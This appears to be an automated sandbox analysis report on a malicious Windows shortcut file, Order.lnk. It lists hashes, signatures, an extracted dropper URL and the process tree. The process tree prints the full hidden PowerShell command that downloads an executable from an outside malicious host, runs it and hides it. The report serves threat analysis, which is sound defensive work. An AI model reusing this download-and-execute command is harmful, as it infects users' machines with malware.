Analysis
-
max time kernel
15s -
max time network
16s -
platform
windows7_x64 -
resource
win7-20240221-en -
resource tags
arch:x64arch:x86image:win7-20240221-enlocale:en-usos:windows7-x64system -
submitted
26-03-2024 10:27
Static task
static1
Behavioral task
behavioral1
Sample
Order/Order.lnk
Resource
win7-20240221-en
windows7-x64
4 signatures
150 seconds
Behavioral task
behavioral2
Sample
Order/Order.lnk
Resource
win10v2004-20240226-en
windows10-2004-x64
15 signatures
150 seconds
General
-
Target
Order/Order.lnk
-
Size
2KB
-
MD5
f88d5c71b79d93f336a5fbc20deeb9dd
-
SHA1
1f77d2879725462577a73adbf83d07c60eb6a384
-
SHA256
a4e51b364548e87948d0075a8adffcd901d2876950ce6f0a939413a0d450b752
-
SHA512
e369ed33574528497c330c79630e49971b4398bc089f239648c270774a62086436a36503db5052d9df72a56a0a8113ac0c9c09e7d86b41ad999c15e1cfc404d2
Score
10/10
Malware Config
Extracted
Language
ps1
Source
URLs
exe.dropper
http://busyestinglsv.site/cmeo/ahbsfrbahogrfoweybrzhfbshdlhabdfhbawvgfrweifrvboherjbvfwr/zxfhvgkhchbavsdfabvlgf1244rhgv5hvkghvkhvkh6vkgvh/clips.exe
Signatures
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Suspicious behavior: EnumeratesProcesses 1 IoCs
pid Process 2584 powershell.exe -
Suspicious use of AdjustPrivilegeToken 1 IoCs
description pid Process Token: SeDebugPrivilege 2584 powershell.exe -
Suspicious use of WriteProcessMemory 3 IoCs
description pid Process procid_target PID 2016 wrote to memory of 2584 2016 cmd.exe 29 PID 2016 wrote to memory of 2584 2016 cmd.exe 29 PID 2016 wrote to memory of 2584 2016 cmd.exe 29
Processes
-
C:\Windows\system32\cmd.execmd /c C:\Users\Admin\AppData\Local\Temp\Order\Order.lnk1⤵
- Suspicious use of WriteProcessMemory
PID:2016 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -WindowStyle Hidden -Command OpenWith.exe;(new-object System.Net.WebClient).DownloadFile('http://busyestinglsv.site/cmeo/ahbsfrbahogrfoweybrzhfbshdlhabdfhbawvgfrweifrvboherjbvfwr/zxfhvgkhchbavsdfabvlgf1244rhgv5hvkghvkhvkh6vkgvh/clips.exe','yjtjewi.exe');./'yjtjewi.exe';(get-item 'yjtjewi.exe').Attributes += 'Hidden';2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2584
-